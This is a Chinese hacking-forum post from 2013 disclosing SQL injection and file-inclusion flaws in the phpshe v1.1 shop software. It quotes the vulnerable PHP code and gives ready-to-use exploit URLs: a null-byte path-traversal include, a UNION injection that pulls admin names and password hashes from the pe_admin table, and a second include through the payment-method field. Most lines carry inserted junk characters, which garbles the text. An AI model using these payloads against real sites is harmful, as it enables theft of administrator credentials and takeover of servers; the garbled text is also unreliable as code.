找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2461|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/' W' w* l; q, `! V% d
/* Phpshe v1.1 Vulnerability
6 Q! M$ y" a0 X/* ========================, c: f1 p! N# m: y) [
/* By: : Kn1f3
: h6 t( G, d" g& w; @& ]: J3 {) A/* E-Mail : 681796@qq.com1 \7 q$ F( ]; Z$ x3 h/ {6 V$ D, X( @
/*******************************************************/
* B+ t: V' a* e/ A0×00 整体大概参数传输1 C  ~- I" \" J7 B- i

$ ]5 r" a3 h2 Z1 ^& k, `6 @7 U) w% N5 r- u, S! E

, }; H# v5 ~" S7 ]0 y//common.php2 K4 ]8 B$ C7 S. t0 _, X4 m/ Y
if (get_magic_quotes_gpc()) {  R% ?$ M" q4 z" b& d3 t
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
- S/ a% t0 D' R2 r' x/ g4 F!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');% k; K. ]  \: r. h9 F2 r
}/ W+ W% x1 F! v7 G4 K4 Z& J' {
else {4 {2 U# G! @9 @' H5 H
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
1 p1 u2 \4 A+ J9 i$ u!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');( |7 X6 a" P- E' D/ f
}5 r' Q9 k" V$ U  v; Z6 B
session_start();8 u4 m5 U' q  J2 f( Y; {+ ]# n4 @
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
! Y4 t! d0 _4 Y!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
3 r/ i4 C. O/ x& t5 t, w/ |- ~- }- X& Y/ @0 h4 s
0×01 包含漏洞; r% u% t% T  s0 R7 [# q  \% e, S, {
2 v/ ?* ?' w7 P- T* t& I
& \% ~( F/ T% h( G, ^, F% z
//首页文件
5 f2 n- i0 H. h  W  B1 v<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
7 ?( ]+ T8 a1 J% Linclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
1 n: Q5 G) H- S( Q4 Npe_result();4 ?9 r6 R. h1 ~/ ]8 w: ^" X
?>! ~! ~/ o; e- w
//common 文件 第15行开始& h" X6 P# x- W( e% D) j
url路由配置
6 {: R# e& x: f: a& l5 e7 f$module = $mod = $act = 'index';( E+ |+ q* F) f1 ~% B9 w; I
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
4 K8 t( u! a* |/ O4 m8 P$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);1 E: d8 e' W4 B" v
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);6 o, S9 X- y+ c3 `+ O0 U4 P/ V. V
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00) w8 W0 P' Y+ k, P; G! p# T9 }

/ u6 v2 O/ O/ L6 d" o

6 A: Z  d7 s2 c9 j3 C8 N1 [ 0×02 搜索注入
/ Y/ r- e% w3 i3 x1 r+ B, Z* ` " U  g6 t; f# i% A" j, X2 R
<code id="code2">

//product.php文件
6 \9 ?" X& g8 k6 x3 Mcase 'list':) _  R7 B) I7 T' s
$category_id = intval($id);
' O3 M: P  r' X0 [$info = $db->pe_select('category', array('category_id'=>$category_id));" B* l: W; m' f9 r9 Y# y& s
//搜索
% t3 r2 d. R1 F; `$sqlwhere = " and `product_state` = 1";
, u+ @+ S5 T/ v- o) _pe_lead('hook/category.hook.php');
+ w$ t$ x. |8 z# b' X: W- ?if ($category_id) {+ n- l( _% z# Y1 R9 A. m
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
# A4 U, P9 S' Z+ F3 d2 \}- F& T: ~+ O# [: N' q. ~
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤+ h/ O, M% T4 k* a% Q" r; H
if ($_g_orderby) {+ u$ b3 a% R; W3 i
$orderby = explode('_', $_g_orderby);0 I1 m, b  Q4 [8 P$ T% N/ c( N
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
. @* n5 J/ J3 }& }" ]. U}6 C3 H1 M; a, c" v% z" d+ k* E
else {! j: Z2 v: x7 f6 x6 T* \
$sqlwhere .= " order by `product_id` desc";6 {& P, i, R& `3 [* u
}0 w% E! D* N( w. P6 S! S
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
3 ?" j' N# `, a6 Q# E/ I) V1 g& ]//热卖排行
& k9 S1 t9 w. ~& P  I$product_hotlist = product_hotlist();
, `7 c+ w! B; l# ~8 T- Y# e//当前路径
2 H* r5 h9 o2 |" m$nowpath = category_path($category_id);  H% ^+ C9 J0 E/ a
$seo = pe_seo($info['category_name']);
: F: X' I: f9 x3 b/ e& g* r9 `include(pe_tpl('product_list.html'));- k0 F  x. v1 J, L% {0 R
//跟进selectall函数库, I* K4 u3 ~  w  c
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())% w5 T1 k, G: }  ?
{( x' A7 i) T) W6 S( G7 `/ w
//处理条件语句* X" a" g2 i; ~" _
$sqlwhere = $this->_dowhere($where);- o+ A; w$ ?% u5 b3 O( D
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);* [" ?& t) R$ d! \2 G& @2 m0 s& A
}% s  a* S) q6 D1 Z
//exp) E) D. @' ?7 n3 ~2 d5 u. \% Y8 }
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='10 p9 |/ [* A7 q- d5 p7 s

</code>
2 ~* \/ ~$ b# {1 V) n: n2 }2 c . m1 e# E9 w) p3 C" h
0×03 包含漏洞2
, X: @- d( s6 ]) Q% S' q1 c8 D
4 y6 y3 |6 z: R, x" p<code id="code3">

//order.php

case 'pay':


6 F% m8 Y! Y8 p3 V( l$order_id = pe_dbhold($_g_id);


1 R0 S1 \4 G3 r- v8 T$cache_payway = cache::get('payway');

% ?+ i- `; S' }  O- J
foreach($cache_payway as $k => $v) {


9 D9 f8 M9 @  s# @+ a" T: _$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


6 N  ^5 T! [" d( h( Vif ($k == 'bank') {


/ m& u& m" ^, o. t' M" q$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

# D3 \- k, ~' K; o
}


4 E. O' u+ X4 p8 w, ^9 ]  m) c}


' T9 Q! q7 \0 K- X" |; l$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


4 D7 z& ^; F0 T" y* F6 H' v, Q!$order['order_id'] && pe_error('订单号错误...');

. Z  J, _# B$ z* i1 A
if (isset($_p_pesubmit)) {


' E# }. {: b( vif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

( e- w' o8 M& C# n8 a# L
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


3 O' W- a8 r! c# _4 L7 oforeach ($info_list as $v) {

8 [$ ?: C6 g. c9 @, Y3 c) G( C/ I
$order['order_name'] .= "{$v['product_name']};";
) W0 o  U2 l. {2 k" u- P5 W4 \. g

, O, ?7 ~4 @  D0 t
}

/ N! p2 }" L+ A' j
echo '正在为您连接支付网站,请稍后...';


0 L; T  z/ K$ G7 }9 o* m- @) Minclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


$ b+ l2 M( `) C) Y5 F}//当一切准备好的时候就可以进行"鸡肋包含了"

/ _) J+ M1 h0 Q% E, e$ z* u2 C
else {


% U) ^4 ~8 c+ t7 i3 Wpe_error('支付错误...');


; N3 i% D9 G7 d4 }}


2 x8 t( k8 M$ c; m' d6 ]6 K7 @3 G}

" M8 s  f0 n1 F$ q) J2 r
$seo = pe_seo('选择支付方式');


. }% G* f) e% d& h6 `include(pe_tpl('order_pay.html'));


8 d# X, C) z/ L  |- pbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>' R5 s. ?6 j$ m" v% M3 ~* f

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表